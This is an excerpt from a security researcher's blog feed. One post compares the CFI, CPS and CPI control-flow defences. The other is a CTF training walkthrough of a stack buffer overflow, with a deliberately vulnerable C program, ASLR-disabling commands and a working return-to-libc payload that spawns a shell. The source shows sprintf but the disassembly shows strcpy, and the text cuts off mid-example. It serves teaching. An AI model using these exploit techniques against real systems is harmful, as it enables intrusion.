</content><category term="CTF"></category><category term="CTF"></category><category term="OldISAs"></category><category term="Turing"></category><category term="GITSCTF"></category></entry><entry><title>On differences between the CFI, CPS, and CPI properties</title><link href="/blog/2014/1007-CFICPSCPIdiffs.html" rel="alternate"></link><published>2014-10-07T14:09:00-04:00</published><updated>2014-10-07T14:09:00-04:00</updated><author><name>Mathias Payer, Volodymyr Kuznetsov</name></author><id>tag:None,2014-10-07:/blog/2014/1007-CFICPSCPIdiffs.html</id><summary type="html">&lt;p&gt;At OSDI'14 we published our paper on &lt;a class="footnote-reference" href="#cpi" id="footnote-reference-1"&gt;[1]&lt;/a&gt; where we introduce two new
security properties that protect programs against control-flow hijack attacks
enabled by memory corruption vulnerabilities. The design space in this area is
already very cluttered and we use this blog post to highlight the differences
between the individual …&lt;/p&gt;</summary><content type="html">&lt;p&gt;At OSDI'14 we published our paper on &lt;a class="footnote-reference" href="#cpi" id="footnote-reference-1"&gt;[1]&lt;/a&gt; where we introduce two new
security properties that protect programs against control-flow hijack attacks
enabled by memory corruption vulnerabilities. The design space in this area is
already very cluttered and we use this blog post to highlight the differences
between the individual properties.&lt;/p&gt;
&lt;p&gt;Some limitations of this post: we do not discuss actual implementations and
vulnerabilities in these implementations but compare the properties themselves
(assuming the best implementation that is theoretically possible). Where we cite
overhead numbers we refer to the strongest prototype implementations of the
properties. This post is also limited in scope; for a complete overview of all
defense mechanisms we refer to the &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13Oakland.pdf"&gt;Eternal War in Memory&lt;/a&gt; paper and the related work
section of our &lt;a class="footnote-reference" href="#cpi" id="footnote-reference-2"&gt;[1]&lt;/a&gt; paper.&lt;/p&gt;
&lt;div class="section" id="control-flow-integrity-cfi"&gt;
&lt;h2&gt;Control-Flow Integrity (CFI)&lt;/h2&gt;
&lt;p&gt;The CFI property &lt;a class="footnote-reference" href="#cfi" id="footnote-reference-3"&gt;[2]&lt;/a&gt; ensures that the control-flow of the application stays
within the control-flow graph (CFG), as determined ahead of execution. The
original CFI paper, as well as many of its follow-ups, determines this CFG using static
analysis. This analysis determines, for each indirect call site, a set of
functions that can be called from that call site on any program execution. All
indirect call sites are then instrumented with runtime checks to enforce that
the function being actually called is one of the functions from the
statically-determined set for that call site.&lt;/p&gt;
&lt;p&gt;CFI does not prevent memory corruptions, instead it simply does a sanity check
on function pointers before they're actually used. The original CFI paper also
proposed to enforce the integrity of return addresses on the stack through the
use of a shadow stack.&lt;/p&gt;
&lt;div class="section" id="cfi-limitations"&gt;
&lt;h3&gt;CFI Limitations&lt;/h3&gt;
&lt;p&gt;CFI restricts the set of targets to which an attacker might redirect the
control-flow of a program, however, this set necessarily contains all functions
that might be called at a given call site on &lt;em&gt;any&lt;/em&gt; program execution, not just
the current one.&lt;/p&gt;
&lt;p&gt;To illustrate this, consider the classical callback function pattern.  Say we
have a Linux driver that installs a callback for a read() operation on the
device file that it manages. The driver sets one of its functions as the
callback upon its initialization, and the kernel will call this function
whenever a read() operation on the corresponding device file is performed. Now,
the indirect call instruction in the kernel that does this dispatch is the same
for all drivers, so on different executions this instruction might call a
callback from any driver. CFI can, at most, enforce that this instruction
calls any callback for a read() operation from any driver. An attacker who can
overwrite the callback pointer might set it to any function from the above set.
If this call is followed by another indirect function call, an attacker might
even set up a chain of functions to execute.&lt;/p&gt;
&lt;p&gt;Unfortunately, there are further limitations in practice. Doing the above
requires precise full-program static analysis: it must look at the entire kernel
and all possible drivers that the kernel can ever load. This is hard in
practice, and we are not aware of such an analysis ever being done precisely on
non-trivial systems (not to mention that it's also a theoretically undecidable
problem).  In practice, the CFI enforcement mechanism simply will not know which
functions the dispatch instruction in the above example might call, so it will
just enforce that it calls any valid function. This was the case for the
original CFI implementation and, although the follow-up work can reduce this set
in certain situations (such as virtual function calls), any CFI implementation
we are aware of would have cases where this set contains almost every
program function as well.&lt;/p&gt;
&lt;p&gt;A potential attack against CFI mechanisms was first introduced by Göktas et al.
in the &lt;a class="footnote-reference" href="#breakcfi" id="footnote-reference-4"&gt;[3]&lt;/a&gt; paper that appeared at the Oakland'14 conference. The paper
introduces several new types of gadgets (i.e., fragments of existing application
code that might be reused by an attacker in a way that was not intended by the
application), including &lt;em&gt;call gadgets&lt;/em&gt;. Such gadgets start at a regular function
prologue and end with an indirect function call,  which enables to transfer
control to the next gadget in the chain. The program might have enough variety
of such linkable gadgets to perform meaningful computation: which is called a
&lt;em&gt;call-oriented programming&lt;/em&gt; (analogous to &lt;em&gt;return-oriented programming&lt;/em&gt;, which
similarly reuses gadgets that end with a return instruction).  Göktas relied on
a combination of call gadgets and other types of gadgets to mount a practical
attack against a coarse-grained CFI implementation. This work can be
generalized, for some programs, to bypass a fine-grained CFI enforcement
mechanism. We have both simple and realistic examples of such programs. E.g.,
we were able to construct such an attack for the Perl interpreter (although, to
be fair, we have not automated or weaponized the attack yet).&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="code-pointer-separation-cps"&gt;
&lt;h2&gt;Code-Pointer Separation (CPS)&lt;/h2&gt;
&lt;p&gt;CPS prevents an attacker from forging a code pointer out of thin air. At most,
an attacker can cause a program to call a function whose address was previously
taken during the current execution. In the above example of a Linux driver, the
dispatch instruction can be potentially subverted to call, e.g., a valid
callback function of a registered driver, but not a callback from a driver that
is not registered on the current run of the kernel or a function that is never
used as a callback.&lt;/p&gt;
&lt;p&gt;Causing a program to call the wrong function under CPS requires an attacker
to (i) find an indirect function call that gets the pointer to be called through
another level of indirection, e.g., &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;struct_ptr-&amp;gt;func_ptr()&lt;/span&gt;&lt;/tt&gt; but not just &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;func_ptr();&lt;/span&gt;&lt;/tt&gt;
(ii) use a memory corruption to overwrite the pointer that is used to get the
function pointer indirectly, e.g., &lt;tt class="docutils literal"&gt;struct_ptr&lt;/tt&gt;, to a location that already
contains a valid function pointer at a proper offset, and (iii) ensure that the
program would not crash if the overwritten pointer, e.g., &lt;tt class="docutils literal"&gt;struct_ptr&lt;/tt&gt;, is
used after it was overwritten but before the function is called.&lt;/p&gt;
&lt;p&gt;CPS ensures precise protection of the return address using the safe stack: this
address cannot be overwritten by the attacker in the first place. Moreover, the
safe stack also protects all register spills as well as most of the local
variables. The safe stack, as implemented for CPI and CPS, has much better
performance characteristics than a shadow stack. For details, see our CPI paper.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="code-pointer-integrity-cpi"&gt;
&lt;h2&gt;Code-Pointer Integrity (CPI)&lt;/h2&gt;
&lt;p&gt;CPI enforces memory safety for all sensitive pointers, which include all code
pointers (just as under CPS) but also all pointers that are used to access
other sensitive pointers indirectly. All such pointers are protected through
runtime memory safety checks. CPI guarantees that an attacker will not be able
to use a memory corruption vulnerability in order to directly change the value
of any sensitive pointer and cause the program to jump to a wrong location as a
result. The only attack vector that remains open is data-based attacks;
preventing those requires full memory safety.&lt;/p&gt;
&lt;p&gt;In contrast to CFI, CPI does not execute any sanity checks on the code
pointers before using them, but instead prevents an attacker from corrupting
such pointers in the first place.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="property-comparison"&gt;
&lt;h2&gt;Property comparison&lt;/h2&gt;
&lt;p&gt;Let's compare the CFI, CPS, and CPI security policies on several
attack scenarios:&lt;/p&gt;
&lt;ol class="upperalpha simple"&gt;
&lt;li&gt;An attacker attempts to overwrite the return pointer on the stack:&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;CFI: the strong CFI, as introduced by Abadi et al., includes optional return
address protection based on a shadow stack, which can prevent such an attack.
To the best of our knowledge, the shadow stack causes around 5% extra
performance overhead on average, hence Abadi et al. made it optional. Many
modern CFI solutions provide weaker return pointer protection for performance
reasons.&lt;/li&gt;
&lt;li&gt;CPS &amp;amp; CPI: thanks to the safe stack, the return address cannot be
overwritten by a corrupt memory access; the safe stack has nearly zero
performance overhead on average.&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="upperalpha simple" start="2"&gt;
&lt;li&gt;An attacker attempts to overwrite a code pointer stored in memory using a
memory corruption vulnerability:&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;CFI: the attacker may redirect the control-flow to any target in the set of
targets permitted for the call site where the pointer is used. In practice,
this set often includes every function in the program (as was the case for
both the original CFI implementation and multiple follow-ups) or wide sets of
functions (e.g., all functions with the same number of arguments). The most
recent CFI implementation &lt;a class="footnote-reference" href="#googlecfi" id="footnote-reference-5"&gt;[4]&lt;/a&gt; reduces the size
of these sets for virtual function calls in C++, but not for generic indirect
function calls.&lt;/li&gt;
&lt;li&gt;CPS &amp;amp; CPI: code pointers cannot be overwritten by corrupt data pointer
dereferences.&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="upperalpha simple" start="3"&gt;
&lt;li&gt;An attacker attempts to overwrite a data pointer that is used to access the
code pointer indirectly (e.g., &lt;tt class="docutils literal"&gt;struct_ptr&lt;/tt&gt; in &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;struct_ptr-&amp;gt;func_ptr())&lt;/span&gt;&lt;/tt&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;CFI: same limitations as above.&lt;/li&gt;
&lt;li&gt;CPS: the attacker may redirect the control flow to any valid function whose
address has already been taken during the current execution and is still stored
in the safe memory.&lt;/li&gt;
&lt;li&gt;CPI: all such indirect pointers are protected and cannot be overwritten by
a corrupt pointer dereferences.&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="upperalpha simple" start="4"&gt;
&lt;li&gt;An attacker attempts to change program data and cause it to take different
execution path (e.g., by changing the decisions made in the if statements):&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;CFI: no guarantees.&lt;/li&gt;
&lt;li&gt;CPS: no guarantees.&lt;/li&gt;
&lt;li&gt;CPI: no guarantees, but some of the pointers are protected.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Comparing CFI and CPS shows that CPS is stronger for scenario B, protecting the
application from attack. For scenario C, CFI may allow a smaller set of targets
than CPS; however, CPS makes it harder to make the program use a wrong code
pointer in the first place. The security comparison between CFI and CPS in this
case depends on the program being protected.&lt;/p&gt;
&lt;p&gt;Comparing CPS and CPI shows that CPI is stronger than CPS for scenario C.&lt;/p&gt;
&lt;p&gt;Comparing CFI and CPI shows that CPI is stronger than CFI in scenarios B and C
due to the memory safety guarantees that it provides for all sensitive
pointers. CFI enforces a static property that was determined at compile time,
whereas CPI enforces actual integrity of all sensitive pointers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="performance-comparison"&gt;
&lt;h2&gt;Performance comparison&lt;/h2&gt;
&lt;p&gt;Comparing performance is hard, especially as most CFI implementations are not
open-source. Also, we have not yet had time to evaluate the open-source VTV
implementation. As an indication of performance we list the overhead numbers
as reported in the actual papers. Please be aware that these numbers
were measured on different systems under different configurations and serve --
at best -- as an indication of actual performance overhead.&lt;/p&gt;
&lt;div class="section" id="safe-stack-cps-cpi"&gt;
&lt;h3&gt;Safe Stack / CPS / CPI:&lt;/h3&gt;
&lt;table border="1" class="docutils"&gt;
&lt;colgroup&gt;
&lt;col width="18%" /&gt;
&lt;col width="13%" /&gt;
&lt;col width="11%" /&gt;
&lt;col width="13%" /&gt;
&lt;col width="28%" /&gt;
&lt;col width="18%" /&gt;
&lt;/colgroup&gt;
&lt;thead valign="bottom"&gt;
&lt;tr&gt;&lt;th class="head"&gt;Property&lt;/th&gt;
&lt;th class="head"&gt;Average&lt;/th&gt;
&lt;th class="head"&gt;Median&lt;/th&gt;
&lt;th class="head"&gt;Maximum&lt;/th&gt;
&lt;th class="head"&gt;Benchmark&lt;/th&gt;
&lt;th class="head"&gt;Reported in&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td&gt;Safe stack&lt;/td&gt;
&lt;td&gt;0.0%&lt;/td&gt;
&lt;td&gt;0.0%&lt;/td&gt;
&lt;td&gt;4.1%&lt;/td&gt;
&lt;td&gt;C/C++ SPEC2006 CPU&lt;/td&gt;
&lt;td&gt;&lt;a class="footnote-reference" href="#cpi" id="footnote-reference-6"&gt;[1]&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;CPS&lt;/td&gt;
&lt;td&gt;1.9%&lt;/td&gt;
&lt;td&gt;0.4%&lt;/td&gt;
&lt;td&gt;17.2%&lt;/td&gt;
&lt;td&gt;C/C++ SPEC2006 CPU&lt;/td&gt;
&lt;td&gt;&lt;a class="footnote-reference" href="#cpi" id="footnote-reference-7"&gt;[1]&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;CPI&lt;/td&gt;
&lt;td&gt;8.4%&lt;/td&gt;
&lt;td&gt;0.4%&lt;/td&gt;
&lt;td&gt;44.2%&lt;/td&gt;
&lt;td&gt;C/C++ SPEC2006 CPU&lt;/td&gt;
&lt;td&gt;&lt;a class="footnote-reference" href="#cpi" id="footnote-reference-8"&gt;[1]&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;div class="section" id="vtv-and-ifcc"&gt;
&lt;h3&gt;VTV and IFCC (&lt;a class="footnote-reference" href="#googlecfi" id="footnote-reference-9"&gt;[4]&lt;/a&gt;):&lt;/h3&gt;
&lt;p&gt;The paper introduces VTV (virtual-table verification) and IFCC (indirect
function-call checks). The former protects virtual function calls, ensuring
that, at any given call site, only a virtual function that corresponds to the
static type of that call site or one of its subtypes can be called. IFCC
restricts indirect function calls to either any valid function, or any function
with the same number of arguments as the call site.&lt;/p&gt;
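&lt;p&gt;To make the IFCC policy concrete, here is a hand-written sketch of the
arity-based check (illustration only: the function names and the linear scan
are made up; the real instrumentation rewrites function pointers to point into
per-arity jump tables, but the enforced property is the same):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;stdlib.h&amp;gt;

typedef int (*fptr2)(int, int);

int add(int a, int b) { return a + b; }
int sub(int a, int b) { return a - b; }

/* set of all address-taken functions with two int arguments */
static fptr2 valid_targets2[] = { add, sub };

int call_checked(fptr2 f, int a, int b)
{
  unsigned i, ok = 0;
  for (i = 0; i &amp;lt; sizeof(valid_targets2)/sizeof(valid_targets2[0]); i++)
    if (valid_targets2[i] == f) ok = 1;
  if (!ok) abort();  /* CFI violation: target not in the allowed set */
  return f(a, b);
}
&lt;/pre&gt;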
&lt;p&gt;Note that neither VTV nor IFCC provides return address protection.&lt;/p&gt;
&lt;p&gt;&lt;a class="footnote-reference" href="#googlecfi" id="footnote-reference-10"&gt;[4]&lt;/a&gt; reports &amp;quot;1% to 8.4% overhead&amp;quot; for VTV only as evaluated on 7 (out
of 19) SPEC2006 CPU benchmarks and Google Chrome. The reported overhead for IFCC
only is around 4%.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="finest-grained-cfi-implementation"&gt;
&lt;h3&gt;Finest-grained CFI implementation&lt;/h3&gt;
&lt;p&gt;The overhead reported by the original CFI implementation &lt;a class="footnote-reference" href="#cfi" id="footnote-reference-11"&gt;[2]&lt;/a&gt; is 21% when
return address protection is enabled. To our knowledge, one of the strongest
CFI implementations around is WIT &lt;a class="footnote-reference" href="#wit" id="footnote-reference-12"&gt;[5]&lt;/a&gt;, with a performance
overhead of 10% on average; this includes protection of both function pointers
and return addresses.&lt;/p&gt;
&lt;table class="docutils footnote" frame="void" id="cpi" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[1]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-1"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-2"&gt;2&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-6"&gt;3&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-7"&gt;4&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-8"&gt;5&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="http://dslab.epfl.ch/pubs/cpi.pdf"&gt;Code-Pointer Integrity. Volodymyr Kuznetsov, László Szekeres, Mathias Payer, George Candea, R. Sekar, Dawn Song. In OSDI'14&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="cfi" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[2]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-3"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-11"&gt;2&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="http://research.microsoft.com/pubs/64250/ccs05.pdf"&gt;Control-Flow Integrity. Martin Abadi, Mihai Budiu, Ulfar Erlingsson, Jay Ligatti. In CCS'05&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="breakcfi" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-4"&gt;[3]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="http://www.ieee-security.org/TC/SP2014/papers/OutOfControl_c_OvercomingControl-FlowIntegrity.pdf"&gt;Out of control: Overcoming control-flow integrity. Enes Göktas, Elias Athanasopoulos, Herbert Bos, Georgios Portokalidis. In Oakland'14&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="googlecfi" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[4]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-5"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-9"&gt;2&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-10"&gt;3&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-tice.pdf"&gt;Enforcing Forward-Edge Control-Flow Integrity in GCC &amp;amp; LLVM. Caroline Tice, Tom Roeder, Peter Collingbourne, Stephen Checkoway, Ulfar Erlingsson, Luis Lozano, Geoff Pike. In Usenix Security'14&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="wit" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-12"&gt;[5]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="http://research.microsoft.com/pubs/75755/WIT-Oakland.pdf"&gt;Preventing Memory Error Exploits with WIT. Periklis Akritidis, Cristian Cadar, Costin Raiciu, Manuel Costa, Miguel Castro. In Oakland'08&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="CPI"></category><category term="CFI"></category><category term="code reuse"></category></entry><entry><title>'sploits or having fun with the heap, stack, and format strings</title><link href="/blog/2014/0930-sploits.html" rel="alternate"></link><published>2014-09-30T12:09:00-04:00</published><updated>2014-09-30T12:09:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-09-30:/blog/2014/0930-sploits.html</id><summary type="html">&lt;p&gt;As part of the weekly CTF meetings we discussed some basic stack-based,
heap-based, and format string based exploits. For system security challenges
these are bread and butter techniques and rely on a huge amount of pre-existing
knowledge about operating systems, kernels, process creation, dynamic loading,
C programming, stack layouts, and …&lt;/p&gt;</summary><content type="html">&lt;p&gt;As part of the weekly CTF meetings we discussed some basic stack-based,
heap-based, and format string based exploits. For system security challenges
these are bread and butter techniques and rely on a huge amount of pre-existing
knowledge about operating systems, kernels, process creation, dynamic loading,
C programming, stack layouts, and assembly. As it's always hard to convey all
the information on the white board during an online session, I thought I'd write
a quick blog post to give some additional pointers and examples for the demo
exploits.&lt;/p&gt;
&lt;p&gt;You might or might not have heard that we are starting a CTF team at Purdue
called &lt;a class="reference external" href="http://albtraum.org/b01lers/"&gt;b01lers&lt;/a&gt;. The weekly meetings are open
to any Purdue student and therefore draw a very mixed crowd, from undergrads to
graduate students, first semester technology and computer science students to
crypto and system security experts in the final year of their PhD. This results
in a very heterogeneous group and makes it challenging to, on one hand, keep the
topic interesting for the experienced crowd and, on the other hand, not lose
the new folk. To allow the CTF club to target more experienced hackers and to
enable a faster bootstrapping sequence, both the ACM SIGSAC and the Forensics
club presidents have agreed to help out with the training. They will take over
some of the more basic tool training, allowing better and faster progress for
all the clubs! Together we can make Purdue better known in the security
landscape.&lt;/p&gt;
&lt;div class="section" id="stack-based-vulnerability"&gt;
&lt;h2&gt;Stack-based vulnerability&lt;/h2&gt;
&lt;p&gt;The first example we'll discuss is a stack-based vulnerability. Individual stack
frames can be super tricky and during the live demonstration I successfully
talked myself into a corner and screwed up the demo (well, it kind of worked but
I did not explain the layouts correctly). Assume we have the following program:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;

void myfunc(char *strs[])
{
  char buf[4];
  printf(&amp;quot;target (myfunc): last argument is at %p\n&amp;quot;, &amp;amp;strs);
  sprintf(buf, &amp;quot;%s&amp;quot;, strs[1]);
  printf(&amp;quot;we copied '%s' into the buffer\n&amp;quot;, buf);
}

int main(int argc, char *argv[])
{
  if(argc &amp;lt; 2) {
    printf(&amp;quot;usage: %s data\n&amp;quot;, argv[0]); return 0;
  }
  printf(&amp;quot;target: SHELL is at %p, system is at %p, exit is at %p\n&amp;quot;, getenv(&amp;quot;SHELL&amp;quot;), &amp;amp;system, &amp;amp;exit);
  myfunc(argv);
  printf(&amp;quot;And we returned safely from our function\n&amp;quot;);
  return 0;
}
&lt;/pre&gt;
&lt;p&gt;With some C experience we see that function myfunc is susceptible to a buffer
overflow. Its argument is an array of strings and the second entry (strs[1],
the program's first command-line argument) is copied into the local stack
buffer (which is super small). Luckily for an
attacker, the program has many information leaks and will tell us readily about
interesting addresses in memory, e.g., the locations of system() and exit() in
the libc and the location of the SHELL environment variable above the stack
region.&lt;/p&gt;
&lt;p&gt;We compile this example with disabled stack protector:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
gcc -O0 -fno-stack-protector -o stackoverflow stackoverflow.c
&lt;/pre&gt;
&lt;p&gt;For the sake of reproducibility, let's disable ASLR:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo sysctl -w kernel.randomize_va_space=0
&lt;/pre&gt;
&lt;p&gt;And when we execute &amp;quot;./stackoverflow fooo&amp;quot; we see:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
target: SHELL is at 0xffffd358, system is at 0x8048480, exit is at 0x8048470
target: last argument is at 0xffffcf40
we copied 'fooo' into the buffer
And we returned safely from our function
&lt;/pre&gt;
&lt;p&gt;Now if the supplied argument (fooo above) is longer than 4 bytes we have a
buffer overflow and start overwriting parts of the stack that might be used for
other data. Even if we copy a larger string (foo1234) the program does not crash
(even though a memory safety violation happens and the buffer is
overflowed). It gets clearer if we look at the assembly of myfunc using objdump
(objdump -d ./stackoverflow|less):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
804859d:       55                      push   %ebp
804859e:       89 e5                   mov    %esp,%ebp
80485a0:       83 ec 28                sub    $0x28,%esp
...
80485c2:       8d 45 f4                lea    -0xc(%ebp),%eax
80485c5:       89 04 24                mov    %eax,(%esp)
80485c8:       e8 83 fe ff ff          call   8048450 &amp;lt;strcpy&amp;#64;plt&amp;gt;
&lt;/pre&gt;
&lt;p&gt;In this code sequence we see that the C compiler opens a 0x28 byte stack frame
and that the buffer buf is allocated 0xc bytes below the saved ebp (the lea -0xc(%ebp) above).
Now if we read the assembly we see that the part of the stack frame that is of
interest to us is:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
prior frame
saved RIP
saved EBP  &amp;lt;- ebp
4 byte padding
4 byte padding
buf[4]  &amp;lt;- ptr to buf
padding
end of frame  &amp;lt;- esp
&lt;/pre&gt;
&lt;p&gt;So when we write up to 4 bytes everything will be fine. If we write up to 12
bytes we'll have a memory corruption and a memory safety violation but no crash
(that's the dangerous area from a software development kind of view as there
clearly is a bug but not a crash). If we supply between 12 and 16 bytes then the
program will continue but when returning to the caller (main in our example) the
saved frame pointer (ebp) will be restored to the new value that the attacker
supplied (usually ending in a crash).&lt;/p&gt;
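&lt;p&gt;To see these three regions empirically we can probe increasing argument
lengths from the shell and watch for the first crash (a quick sketch; the exact
thresholds depend on your compiler's frame padding):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
for i in `seq 4 24`; do
  ./stackoverflow `perl -e &amp;quot;print 'A'x$i;&amp;quot;` &amp;gt; /dev/null 2&amp;gt;&amp;amp;1
  echo &amp;quot;len $i: exit status $?&amp;quot;
done
&lt;/pre&gt;
&lt;p&gt;Short inputs exit cleanly while longer ones report a non-zero exit status
once the saved registers are clobbered.&lt;/p&gt;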
&lt;p&gt;Now if we want to exploit this buffer overflow we'll have to redirect the
control flow to a function in libc that we can control. For this case, we use
the handy system() function that executes a shell command for us.&lt;/p&gt;
&lt;p&gt;We execute:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print &amp;quot;A&amp;quot;x16;'`
&lt;/pre&gt;
&lt;p&gt;In this example we set a couple of things: first we set two environment
variables (PS1 which controls how the prompt looks like and SHELL where we
define what command will be executed). As we're overwriting EBP with all 'A's it
will obviously crash, but we can note the locations of system, exit, and SHELL
for later (in my case the values are 0x8048480 for system, 0x8048470 for exit,
and 0xffffd29c for SHELL but your values might differ).&lt;/p&gt;
&lt;p&gt;Now, let's examine the crash in a debugger:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
gdb --args ./stackoverflow `perl -e 'print &amp;quot;A&amp;quot;x16;'`
&lt;/pre&gt;
&lt;p&gt;If we execute the program using 'run' or 'r' we get a SIGILL due to the messed
up stack frame when we return. Using 'bt' we can display the remaining stack
frames and with 'frame 0' and 'info frame' we can display data on frames. If we
instead execute a longer array (x20 instead of x16 above) we see that the
program crashes in 0x41414141:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
we copied 'AAAAAAAAAAAAAAAAAAAA' into the buffer

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
&lt;/pre&gt;
&lt;p&gt;Looking at the stack frames using 'bt' tells us that it's all messed up. But
0x41 is 'A' in the ASCII table which tells us that we have some control over the
return instruction pointer. We can peek around further and set some break points
at interesting locations and I invite you to play around ('disas myfunc'
displays the assembly of myfunc, 'break *address' stops the execution at
address and let's you inspect the program state, 'c' continues, 'si' continues
execution one instruction at a time).&lt;/p&gt;
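&lt;p&gt;A session might look as follows (the breakpoint address is the instruction
right after the strcpy call in my disassembly and will differ on your
machine):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
gdb --args ./stackoverflow `perl -e 'print &amp;quot;A&amp;quot;x20;'`
(gdb) break *0x80485cd    &amp;lt;- address after the strcpy call, from objdump
(gdb) run
(gdb) x/8wx $esp          &amp;lt;- dump the (smashed) stack frame
(gdb) info frame
(gdb) c                   &amp;lt;- continue until the crash at 0x41414141
&lt;/pre&gt;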
&lt;p&gt;Now if we use the information we learned above and set the return instruction
pointer to system() we can supply a parameter:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print &amp;quot;A&amp;quot;x16 . &amp;quot;\x80\x84\x04\x08&amp;quot; . &amp;quot;\xf3\xc0\xfe\xc0&amp;quot; . &amp;quot;\x9c\xd2\xff\xff&amp;quot;;'`
&lt;/pre&gt;
&lt;p&gt;Here we configure the stack as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
prior frame            // now saved argument to system, points to SHELL
prior frame            // now return address for system(), 0xc0fec0f3 in the example above
saved RIP              // now points to system()
saved EBP  &amp;lt;- ebp      // AAAA
4 byte padding         // AAAA
4 byte padding         // AAAA
buf[4]  &amp;lt;- ptr to buf  // AAAA
padding
end of frame  &amp;lt;- esp
&lt;/pre&gt;
&lt;p&gt;Now if we return from myfunc we no longer end up in main but it looks like a
legit call to system() with &amp;amp;SHELL as a parameter. If we execute the command
above we're dropped into a shell but if we exit that shell the original program
will segfault. If we want a clean exit we can prepare a second stack frame where
0xc0fec0f3 is used as a second invocation frame, executing a clean exit:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
